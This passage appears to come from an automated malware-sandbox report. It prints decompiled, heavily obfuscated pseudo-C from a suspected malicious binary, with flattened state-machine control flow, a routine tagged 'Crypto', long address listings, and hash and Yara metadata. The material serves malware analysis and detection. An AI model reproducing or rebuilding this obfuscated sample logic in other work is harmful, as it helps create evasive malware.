				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0x23ca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E0022C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0x23ca20; // 0x0
								_t554 =  *0x23ca20; // 0x0
								_t555 = E0022F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E00239465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E00228736(_t597);
									 *0x23ca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0x23ca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E002287FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0x23ca20; // 0x0
											_push(_t590);
											_push(_t590);
											E0023AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0x23ca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E00231A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E002275AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0x23ca20; // 0x0
							_push(_t590);
							_push(_t590);
							E0023AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0x23ca20; // 0x0
								_t592 =  *0x23ca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E002266C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E0022F536(_v92, _v100, _v108,  *0x23ca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}
































































































                                              0x00221d01
                                              0x00221d0b
                                              0x00221d0c
                                              0x00221d0e
                                              0x00221d13
                                              0x00221d1e
                                              0x00221d21
                                              0x00221d2c
                                              0x00221d2e
                                              0x00221d37
                                              0x00221d3f
                                              0x00221d4a
                                              0x00221d4f
                                              0x00221d55
                                              0x00221d5d
                                              0x00221d65
                                              0x00221d70
                                              0x00221d7b
                                              0x00221d86
                                              0x00221d91
                                              0x00221d9c
                                              0x00221da7
                                              0x00221db2
                                              0x00221dbd
                                              0x00221dd3
                                              0x00221dde
                                              0x00221de6
                                              0x00221df1
                                              0x00221df9
                                              0x00221dfe
                                              0x00221e06
                                              0x00221e0e
                                              0x00221e16
                                              0x00221e1e
                                              0x00221e26
                                              0x00221e2e
                                              0x00221e36
                                              0x00221e42
                                              0x00221e47
                                              0x00221e52
                                              0x00221e53
                                              0x00221e57
                                              0x00221e5f
                                              0x00221e67
                                              0x00221e6f
                                              0x00221e77
                                              0x00221e7f
                                              0x00221e87
                                              0x00221e92
                                              0x00221ea6
                                              0x00221ead
                                              0x00221eb8
                                              0x00221ec3
                                              0x00221ecb
                                              0x00221ed3
                                              0x00221ede
                                              0x00221ee9
                                              0x00221ef1
                                              0x00221efc
                                              0x00221f07
                                              0x00221f19
                                              0x00221f23
                                              0x00221f28
                                              0x00221f2e
                                              0x00221f33
                                              0x00221f3b
                                              0x00221f43
                                              0x00221f4b
                                              0x00221f4f
                                              0x00221f54
                                              0x00221f5c
                                              0x00221f6e
                                              0x00221f73
                                              0x00221f7c
                                              0x00221f87
                                              0x00221f92
                                              0x00221f9d
                                              0x00221fa8
                                              0x00221fb0
                                              0x00221fbc
                                              0x00221fc1
                                              0x00221fc7
                                              0x00221fcf
                                              0x00221fd7
                                              0x00221fe2
                                              0x00221fed
                                              0x00221ff8
                                              0x00222003
                                              0x0022200b
                                              0x00222018
                                              0x0022201b
                                              0x0022201f
                                              0x00222027
                                              0x0022202f
                                              0x00222037
                                              0x0022203f
                                              0x00222047
                                              0x0022204c
                                              0x00222054
                                              0x0022205f
                                              0x0022206a
                                              0x00222075
                                              0x0022208b
                                              0x00222092
                                              0x0022209d
                                              0x002220a8
                                              0x002220b0
                                              0x002220b8
                                              0x002220c0
                                              0x002220c8
                                              0x002220d0
                                              0x002220db
                                              0x002220e3
                                              0x002220ee
                                              0x00222100
                                              0x00222103
                                              0x0022210a
                                              0x00222115
                                              0x00222120
                                              0x0022212d
                                              0x00222138
                                              0x00222140
                                              0x00222145
                                              0x0022214a
                                              0x00222152
                                              0x0022215a
                                              0x0022215f
                                              0x00222167
                                              0x0022216f
                                              0x0022217a
                                              0x00222182
                                              0x0022218d
                                              0x00222198
                                              0x002221a0
                                              0x002221ab
                                              0x002221b6
                                              0x002221be
                                              0x002221c6
                                              0x002221ce
                                              0x002221d6
                                              0x002221de
                                              0x002221e6
                                              0x002221eb
                                              0x002221f3
                                              0x002221fb
                                              0x00222203
                                              0x0022220b
                                              0x00222213
                                              0x0022221b
                                              0x00222223
                                              0x0022222e
                                              0x00222243
                                              0x00222246
                                              0x0022224d
                                              0x00222258
                                              0x00222268
                                              0x0022226c
                                              0x00222274
                                              0x0022227c
                                              0x00222284
                                              0x0022228c
                                              0x00222291
                                              0x00222299
                                              0x002222a1
                                              0x002222a9
                                              0x002222b2
                                              0x002222b7
                                              0x002222bd
                                              0x002222c5
                                              0x002222cd
                                              0x002222d5
                                              0x002222da
                                              0x002222e7
                                              0x002222e8
                                              0x002222ec
                                              0x002222f4
                                              0x00222308
                                              0x0022230f
                                              0x0022231a
                                              0x00222325
                                              0x00222330
                                              0x0022233b
                                              0x00222343
                                              0x0022234b
                                              0x00222360
                                              0x00222365
                                              0x0022236b
                                              0x00222373
                                              0x0022237b
                                              0x00222388
                                              0x0022238b
                                              0x0022238f
                                              0x00222394
                                              0x0022239c
                                              0x002223a4
                                              0x002223ac
                                              0x002223b4
                                              0x002223bc
                                              0x002223c7
                                              0x002223cf
                                              0x002223da
                                              0x002223ed
                                              0x002223f4
                                              0x002223ff
                                              0x00222407
                                              0x0022240f
                                              0x00222417
                                              0x0022241f
                                              0x00222427
                                              0x0022242f
                                              0x00222437
                                              0x0022243f
                                              0x00222447
                                              0x00222457
                                              0x0022245b
                                              0x00222467
                                              0x0022246a
                                              0x0022246e
                                              0x00222476
                                              0x00222481
                                              0x0022248c
                                              0x00222497
                                              0x002224a2
                                              0x002224ad
                                              0x002224b8
                                              0x002224c3
                                              0x002224ce
                                              0x002224d9
                                              0x002224e1
                                              0x002224e6
                                              0x002224ee
                                              0x002224f6
                                              0x002224f6
                                              0x002224fe
                                              0x002224fe
                                              0x002224fe
                                              0x002224fe
                                              0x00222504
                                              0x00000000
                                              0x00000000
                                              0x0022250a
                                              0x00222686
                                              0x00222687
                                              0x002226a7
                                              0x002226b1
                                              0x002226b4
                                              0x002226b9
                                              0x002226c0
                                              0x002226c8
                                              0x00000000
                                              0x00222510
                                              0x00222516
                                              0x00222620
                                              0x00222644
                                              0x00222657
                                              0x00222669
                                              0x0022266f
                                              0x00222677
                                              0x00222679
                                              0x0022267e
                                              0x00000000
                                              0x0022251c
                                              0x00222522
                                              0x002225f6
                                              0x002225fa
                                              0x002225fb
                                              0x00222600
                                              0x00222606
                                              0x00222609
                                              0x0022260f
                                              0x00000000
                                              0x0022260f
                                              0x00222528
                                              0x0022252a
                                              0x002225cf
                                              0x002225d5
                                              0x002225d8
                                              0x002225dd
                                              0x002225e0
                                              0x00000000
                                              0x00222530
                                              0x00222536
                                              0x002225a0
                                              0x002225a5
                                              0x002225a6
                                              0x002225aa
                                              0x002225af
                                              0x002225b2
                                              0x00000000
                                              0x00222538
                                              0x0022253e
                                              0x00000000
                                              0x00222544
                                              0x00222567
                                              0x0022256d
                                              0x0022256d
                                              0x00222573
                                              0x00222578
                                              0x0022257d
                                              0x0022282d
                                              0x00222583
                                              0x00222583
                                              0x00000000
                                              0x00222583
                                              0x0022257d
                                              0x0022253e
                                              0x00222536
                                              0x0022252a
                                              0x00222522
                                              0x00222516
                                              0x00222721
                                              0x0022272d
                                              0x0022272d
                                              0x002226d9
                                              0x002227fb
                                              0x00222802
                                              0x00222807
                                              0x0022280c
                                              0x00222818
                                              0x00000000
                                              0x0022280e
                                              0x0022280e
                                              0x00000000
                                              0x0022280e
                                              0x002226df
                                              0x002226e5
                                              0x00222796
                                              0x0022279b
                                              0x0022279c
                                              0x002227a0
                                              0x002227a5
                                              0x002227a8
                                              0x00000000
                                              0x002226eb
                                              0x002226f1
                                              0x00222744
                                              0x0022275b
                                              0x00222761
                                              0x00222764
                                              0x00222769
                                              0x00222770
                                              0x00222778
                                              0x00000000
                                              0x002226f3
                                              0x002226f9
                                              0x00000000
                                              0x002226ff
                                              0x0022271a
                                              0x00222720
                                              0x002226f9
                                              0x002226f1
                                              0x002226e5
                                              0x00000000
                                              0x0022281a
                                              0x0022281a
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$t<$0$@$uG$
                                              • API String ID: 0-1338720442
                                              • Opcode ID: 1baea8f5458796ebd1212e7ee3e70693c1d860a1bcf88851e46bbf23bf174e92
                                              • Instruction ID: 44c95fb7b7498e3c173a0b1aa24092676b7894679c473fd19e37eb4d277ef16b
                                              • Opcode Fuzzy Hash: 1baea8f5458796ebd1212e7ee3e70693c1d860a1bcf88851e46bbf23bf174e92
                                              • Instruction Fuzzy Hash: 3E424572508381DFE378CF65C98AA9BBBE1BBC4304F10891DE5D9962A0D7B58859CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023511B, Relevance: 17.9, Strings: 14, Instructions: 390COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E0023511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E00232674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E00238C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E00228736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0x23c7a0);
					_push(_v208);
					E00227F4B(_t521, E0023878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E00232025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E0022EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E0022B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E0022EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E0022B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0x23c710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E002211C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0023878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E00232025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}




































































                                              0x0023511b
                                              0x0023511b
                                              0x00235125
                                              0x0023512c
                                              0x00235133
                                              0x0023513b
                                              0x00235146
                                              0x0023514e
                                              0x00235156
                                              0x0023515e
                                              0x00235163
                                              0x0023516b
